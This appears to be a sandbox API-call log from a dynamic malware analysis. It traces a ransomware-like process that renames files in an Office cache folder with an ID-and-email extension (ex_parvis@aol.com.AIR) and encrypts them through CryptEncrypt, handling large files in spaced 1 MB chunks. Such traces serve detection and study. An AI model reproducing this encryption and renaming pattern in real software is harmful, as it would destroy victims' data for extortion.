	[0095.438] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0095.440] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0095.440] GetProcessHeap () returned 0x540000
	[0095.440] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0095.440] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8723) returned 1
	[0095.440] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2213
	[0095.440] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0095.440] GetProcessHeap () returned 0x540000
	[0095.440] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0095.440] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0095.441] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0095.442] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0095.442] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0095.442] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2213) returned 0x5febb8
	[0095.442] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2213) returned 0x600dd8
	[0095.442] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.443] ReadFile (in: hFile=0x28c, lpBuffer=0x5febb8, nNumberOfBytesToRead=0x2213, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5febb8*, lpNumberOfBytesRead=0x3a1f778*=0x2213, lpOverlapped=0x0) returned 1
	[0095.443] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-8723, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.443] WriteFile (in: hFile=0x28c, lpBuffer=0x600dd8*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x600dd8*, lpNumberOfBytesWritten=0x3a1f778*=0x2213, lpOverlapped=0x0) returned 1
	[0095.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febb8 | out: hHeap=0x540000) returned 1
	[0095.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x600dd8 | out: hHeap=0x540000) returned 1
	[0095.444] CloseHandle (hObject=0x28c) returned 1
	[0095.445] GetProcessHeap () returned 0x540000
	[0095.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0095.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0095.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0095.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc2c8 | out: hHeap=0x540000) returned 1
	[0095.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc220 | out: hHeap=0x540000) returned 1
	[0095.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc220
	[0095.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0095.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0095.445] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0095.445] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0095.445] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", dwFileAttributes=0x80) returned 1
	[0095.445] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 76
	[0095.445] GetProcessHeap () returned 0x540000
	[0095.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0095.445] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi"
	[0095.445] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0095.445] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0095.448] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0095.448] GetProcessHeap () returned 0x540000
	[0095.448] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0095.448] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=12060672) returned 1
	[0095.448] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb80800
	[0095.448] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0095.448] GetProcessHeap () returned 0x540000
	[0095.448] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0095.448] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0095.448] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0095.450] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0095.450] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0095.450] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb80800) returned 0x3c20020
	[0095.451] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb80800) returned 0x47b0020
	[0095.452] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.452] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xb80800, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xb80800, lpOverlapped=0x0) returned 1
	[0096.098] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.098] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.098] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", dwFileAttributes=0x80) returned 1
	[0096.099] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 76
	[0096.099] GetProcessHeap () returned 0x540000
	[0096.099] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0096.099] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab"
	[0096.099] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.099] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.101] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.102] GetProcessHeap () returned 0x540000
	[0096.102] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0096.102] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=195011319) returned 1
	[0096.102] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb9fa2f7
	[0096.102] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.102] GetProcessHeap () returned 0x540000
	[0096.102] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.102] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.102] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.108] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.108] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3c20020
	[0096.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3d30020
	[0096.109] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.109] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.139] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.139] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.139] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.139] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.161] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000
	[0096.161] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.163] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.163] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.163] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.164] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.175] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000
	[0096.176] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.178] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.178] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.178] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.178] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.191] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000
	[0096.191] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.194] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.194] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.194] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.194] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.207] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000
	[0096.207] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.209] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.209] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.209] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.209] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.222] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000
	[0096.222] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.225] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.225] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.225] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.225] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.237] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000
	[0096.237] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.239] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.240] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.240] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.240] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.245] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000
	[0096.245] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.248] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.248] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.248] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0096.248] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.261] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000
	[0096.261] WriteFile (in: hFile=0x28c, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0096.263] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
